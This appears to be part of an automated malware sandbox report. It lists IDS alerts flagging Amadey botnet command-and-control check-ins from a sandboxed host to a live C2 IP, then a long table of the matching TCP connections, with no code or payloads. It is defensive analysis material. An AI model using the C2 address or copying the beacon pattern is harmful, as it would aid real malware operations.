                  2024-11-23T20:53:59.298221+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549804193.3.19.15480TCP
                  2024-11-23T20:53:59.298221+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549804193.3.19.15480TCP
                  2024-11-23T20:54:03.548223+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549815193.3.19.15480TCP
                  2024-11-23T20:54:03.548223+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549815193.3.19.15480TCP
                  2024-11-23T20:54:07.798356+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549826193.3.19.15480TCP
                  2024-11-23T20:54:07.798356+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549826193.3.19.15480TCP
                  2024-11-23T20:54:12.048318+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549837193.3.19.15480TCP
                  2024-11-23T20:54:12.048318+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549837193.3.19.15480TCP
                  2024-11-23T20:54:16.282841+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549848193.3.19.15480TCP
                  2024-11-23T20:54:16.282841+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549848193.3.19.15480TCP
                  2024-11-23T20:54:20.533150+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549859193.3.19.15480TCP
                  2024-11-23T20:54:20.533150+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549859193.3.19.15480TCP
                  2024-11-23T20:54:24.851912+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549867193.3.19.15480TCP
                  2024-11-23T20:54:24.851912+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549867193.3.19.15480TCP
                  2024-11-23T20:54:29.157698+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549878193.3.19.15480TCP
                  2024-11-23T20:54:29.157698+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549878193.3.19.15480TCP
                  2024-11-23T20:54:33.560630+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549887193.3.19.15480TCP
                  2024-11-23T20:54:33.560630+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549887193.3.19.15480TCP
                  2024-11-23T20:54:37.814020+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549898193.3.19.15480TCP
                  2024-11-23T20:54:37.814020+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549898193.3.19.15480TCP
                  2024-11-23T20:54:42.064285+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549909193.3.19.15480TCP
                  2024-11-23T20:54:42.064285+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549909193.3.19.15480TCP
                  2024-11-23T20:54:46.314044+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549920193.3.19.15480TCP
                  2024-11-23T20:54:46.314044+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549920193.3.19.15480TCP
                  2024-11-23T20:54:50.563900+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549930193.3.19.15480TCP
                  2024-11-23T20:54:50.563900+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549930193.3.19.15480TCP
                  2024-11-23T20:54:54.816557+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549940193.3.19.15480TCP
                  2024-11-23T20:54:54.816557+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549940193.3.19.15480TCP
                  2024-11-23T20:54:57.550787+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549950193.3.19.15480TCP
                  2024-11-23T20:54:57.550787+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549950193.3.19.15480TCP
                  2024-11-23T20:55:01.782905+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549958193.3.19.15480TCP
                  2024-11-23T20:55:01.782905+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549958193.3.19.15480TCP
                  2024-11-23T20:55:06.032766+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549967193.3.19.15480TCP
                  2024-11-23T20:55:06.032766+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549967193.3.19.15480TCP
                  2024-11-23T20:55:10.291064+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549976193.3.19.15480TCP
                  2024-11-23T20:55:10.291064+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549976193.3.19.15480TCP
                  2024-11-23T20:55:14.517087+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549987193.3.19.15480TCP
                  2024-11-23T20:55:14.517087+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549987193.3.19.15480TCP
                  2024-11-23T20:55:18.770958+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.549998193.3.19.15480TCP
                  2024-11-23T20:55:18.770958+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.549998193.3.19.15480TCP
                  2024-11-23T20:55:23.026943+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550009193.3.19.15480TCP
                  2024-11-23T20:55:23.026943+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550009193.3.19.15480TCP
                  2024-11-23T20:55:27.284604+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550016193.3.19.15480TCP
                  2024-11-23T20:55:27.284604+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550016193.3.19.15480TCP
                  2024-11-23T20:55:31.534796+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550017193.3.19.15480TCP
                  2024-11-23T20:55:31.534796+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550017193.3.19.15480TCP
                  2024-11-23T20:55:35.782914+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550018193.3.19.15480TCP
                  2024-11-23T20:55:35.782914+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550018193.3.19.15480TCP
                  2024-11-23T20:55:40.001425+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550019193.3.19.15480TCP
                  2024-11-23T20:55:40.001425+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550019193.3.19.15480TCP
                  2024-11-23T20:55:44.236221+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550020193.3.19.15480TCP
                  2024-11-23T20:55:44.236221+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550020193.3.19.15480TCP
                  2024-11-23T20:55:48.526834+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550021193.3.19.15480TCP
                  2024-11-23T20:55:48.526834+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550021193.3.19.15480TCP
                  2024-11-23T20:55:52.784639+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550022193.3.19.15480TCP
                  2024-11-23T20:55:52.784639+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550022193.3.19.15480TCP
                  2024-11-23T20:55:57.136097+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550023193.3.19.15480TCP
                  2024-11-23T20:55:57.136097+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550023193.3.19.15480TCP
                  2024-11-23T20:56:01.438981+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550024193.3.19.15480TCP
                  2024-11-23T20:56:01.438981+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550024193.3.19.15480TCP
                  2024-11-23T20:56:05.680904+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550025193.3.19.15480TCP
                  2024-11-23T20:56:05.680904+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550025193.3.19.15480TCP
                  2024-11-23T20:56:09.923228+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550026193.3.19.15480TCP
                  2024-11-23T20:56:09.923228+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550026193.3.19.15480TCP
                  2024-11-23T20:56:14.164217+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550027193.3.19.15480TCP
                  2024-11-23T20:56:14.164217+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550027193.3.19.15480TCP
                  2024-11-23T20:56:18.455177+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550028193.3.19.15480TCP
                  2024-11-23T20:56:18.455177+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550028193.3.19.15480TCP
                  2024-11-23T20:56:22.706673+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550029193.3.19.15480TCP
                  2024-11-23T20:56:22.706673+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550029193.3.19.15480TCP
                  2024-11-23T20:56:26.956810+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550030193.3.19.15480TCP
                  2024-11-23T20:56:26.956810+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550030193.3.19.15480TCP
                  2024-11-23T20:56:31.204734+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550031193.3.19.15480TCP
                  2024-11-23T20:56:31.204734+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550031193.3.19.15480TCP
                  2024-11-23T20:56:35.454542+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550032193.3.19.15480TCP
                  2024-11-23T20:56:35.454542+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550032193.3.19.15480TCP
                  2024-11-23T20:56:39.694587+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550033193.3.19.15480TCP
                  2024-11-23T20:56:39.694587+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550033193.3.19.15480TCP
                  2024-11-23T20:56:43.907721+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550034193.3.19.15480TCP
                  2024-11-23T20:56:43.907721+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550034193.3.19.15480TCP
                  2024-11-23T20:56:48.157989+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.550035193.3.19.15480TCP
                  2024-11-23T20:56:48.157989+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.550035193.3.19.15480TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Nov 23, 2024 20:53:00.002206087 CET4970480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:00.010263920 CET4970580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:00.124864101 CET8049704193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:00.126138926 CET4970480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:00.133295059 CET8049705193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:00.133389950 CET4970580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:00.134437084 CET4970580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:00.156812906 CET4970480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:00.260898113 CET8049705193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:00.283392906 CET8049704193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:04.143083096 CET4970580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:04.143141031 CET4970480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:04.252187967 CET4970680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:04.371838093 CET8049706193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:04.372108936 CET4970680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:04.372400045 CET4970680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:04.491997957 CET8049706193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:08.382363081 CET4970680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:08.489516973 CET4970780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:08.612205982 CET8049707193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:08.612313986 CET4970780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:08.615879059 CET4970780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:08.739934921 CET8049707193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:09.158493996 CET4970880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:09.280980110 CET8049708193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:09.281224012 CET4970880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:09.281379938 CET4970880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:09.401662111 CET8049708193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:12.626276016 CET4970880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:12.626322985 CET4970780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:12.738591909 CET4970980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:12.858773947 CET8049709193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:12.858923912 CET4970980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:12.859211922 CET4970980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:12.978961945 CET8049709193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:16.860878944 CET4970980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:16.972708941 CET4971280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:17.093209982 CET8049712193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:17.093353987 CET4971280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:17.093691111 CET4971280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:17.213599920 CET8049712193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:17.642725945 CET4971480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:17.762764931 CET8049714193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:17.762995958 CET4971480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:17.763102055 CET4971480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:17.883232117 CET8049714193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:21.095122099 CET4971480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:21.095201015 CET4971280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:21.205379963 CET4972280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:21.325506926 CET8049722193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:21.325592041 CET4972280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:21.325753927 CET4972280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:21.446183920 CET8049722193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:25.313904047 CET4972280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:25.426434994 CET4973380192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:25.581192970 CET8049733193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:25.581295967 CET4973380192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:25.581552029 CET4973380192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:25.701292992 CET8049733193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:26.112663984 CET4973580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:26.236144066 CET8049735193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:26.236242056 CET4973580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:26.236412048 CET4973580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:26.362917900 CET8049735193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:29.579644918 CET4973580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:29.579693079 CET4973380192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:29.689541101 CET4974180192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:29.815486908 CET8049741193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:29.815574884 CET4974180192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:29.815764904 CET4974180192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:29.935518026 CET8049741193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:33.829479933 CET4974180192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:33.941314936 CET4975280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:34.065119982 CET8049752193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:34.065262079 CET4975280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:34.065401077 CET4975280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:34.191620111 CET8049752193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:34.595963955 CET4975480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:34.715733051 CET8049754193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:34.715802908 CET4975480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:34.715946913 CET4975480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:34.835439920 CET8049754193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:38.073084116 CET4975280192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:38.073132992 CET4975480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:38.192760944 CET4976480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:38.313626051 CET8049764193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:38.313788891 CET4976480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:38.322386980 CET4976480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:38.444483042 CET8049764193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:42.313889027 CET4976480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:42.425879002 CET4977580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:42.546495914 CET8049775193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:42.546619892 CET4977580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:42.546869040 CET4977580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:42.671483994 CET8049775193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:43.080255032 CET4977680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:43.200009108 CET8049776193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:43.200149059 CET4977680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:43.200330019 CET4977680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:43.320007086 CET8049776193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:46.532660007 CET4977580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:46.532797098 CET4977680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:46.643244982 CET4978780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:46.768717051 CET8049787193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:46.768811941 CET4978780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:46.769010067 CET4978780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:46.892851114 CET8049787193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:50.782733917 CET4978780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:50.894567966 CET4979480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:51.020188093 CET8049794193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:51.020323038 CET4979480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:51.020618916 CET4979480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:51.147005081 CET8049794193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:55.042479992 CET4979480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:55.183239937 CET4980480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:55.305100918 CET8049804193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:55.305166006 CET4980480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:55.310513020 CET4980480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:55.430382013 CET8049804193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:59.298221111 CET4980480192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:59.411309958 CET4981580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:59.532593966 CET8049815193.3.19.154192.168.2.5
                  Nov 23, 2024 20:53:59.532694101 CET4981580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:59.532934904 CET4981580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:53:59.691047907 CET8049815193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:03.548223019 CET4981580192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:03.660164118 CET4982680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:03.786046982 CET8049826193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:03.786185026 CET4982680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:03.786379099 CET4982680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:03.905863047 CET8049826193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:07.798356056 CET4982680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:07.926301003 CET4983780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:08.046344042 CET8049837193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:08.046516895 CET4983780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:08.046710014 CET4983780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:08.167445898 CET8049837193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:12.048317909 CET4983780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:12.160501957 CET4984880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:12.280471087 CET8049848193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:12.280692101 CET4984880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:12.280874014 CET4984880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:12.400686979 CET8049848193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:16.282840967 CET4984880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:16.395031929 CET4985980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:16.514506102 CET8049859193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:16.514682055 CET4985980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:16.532166004 CET4985980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:16.652009010 CET8049859193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:20.533149958 CET4985980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:20.663415909 CET4986780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:20.789742947 CET8049867193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:20.790651083 CET4986780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:20.790802956 CET4986780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:20.912870884 CET8049867193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:24.851912022 CET4986780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:24.996495008 CET4987880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:25.117372036 CET8049878193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:25.117521048 CET4987880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:25.131287098 CET4987880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:25.255280972 CET8049878193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:29.157697916 CET4987880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:29.269805908 CET4988780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:29.402349949 CET8049887193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:29.402704000 CET4988780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:29.402793884 CET4988780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:29.522439003 CET8049887193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:33.560630083 CET4988780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:33.691617966 CET4989880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:33.813066006 CET8049898193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:33.813146114 CET4989880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:33.813493967 CET4989880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:34.092799902 CET8049898193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:37.814019918 CET4989880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:37.927474976 CET4990980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:38.049320936 CET8049909193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:38.049408913 CET4990980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:38.049715996 CET4990980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:38.169197083 CET8049909193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:42.064285040 CET4990980192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:42.175811052 CET4992080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:42.298598051 CET8049920193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:42.298685074 CET4992080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:42.298825026 CET4992080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:42.419357061 CET8049920193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:46.314043999 CET4992080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:46.425678968 CET4993080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:46.549834013 CET8049930193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:46.549961090 CET4993080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:46.556485891 CET4993080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:46.680821896 CET8049930193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:50.563899994 CET4993080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:50.675829887 CET4994080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:50.799247980 CET8049940193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:50.800801039 CET4994080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:50.800801039 CET4994080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:50.927278042 CET8049940193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:54.816556931 CET4994080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:54.928177118 CET4995080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:55.048604965 CET8049950193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:55.048691034 CET4995080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:55.048923969 CET4995080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:55.169949055 CET8049950193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:57.550786972 CET4995080192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:57.660074949 CET4995880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:57.780625105 CET8049958193.3.19.154192.168.2.5
                  Nov 23, 2024 20:54:57.780713081 CET4995880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:57.781066895 CET4995880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:54:57.907393932 CET8049958193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:01.782905102 CET4995880192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:01.895857096 CET4996780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:02.020486116 CET8049967193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:02.020572901 CET4996780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:02.021011114 CET4996780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:02.140578032 CET8049967193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:06.032766104 CET4996780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:06.156371117 CET4997680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:06.276398897 CET8049976193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:06.276474953 CET4997680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:06.276736021 CET4997680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:06.396256924 CET8049976193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:10.291064024 CET4997680192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:10.394263029 CET4998780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:10.513916016 CET8049987193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:10.514005899 CET4998780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:10.514265060 CET4998780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:10.633970022 CET8049987193.3.19.154192.168.2.5
                  Nov 23, 2024 20:55:14.517086983 CET4998780192.168.2.5193.3.19.154
                  Nov 23, 2024 20:55:14.630228996 CET4999880192.168.2.5193.3.19.154
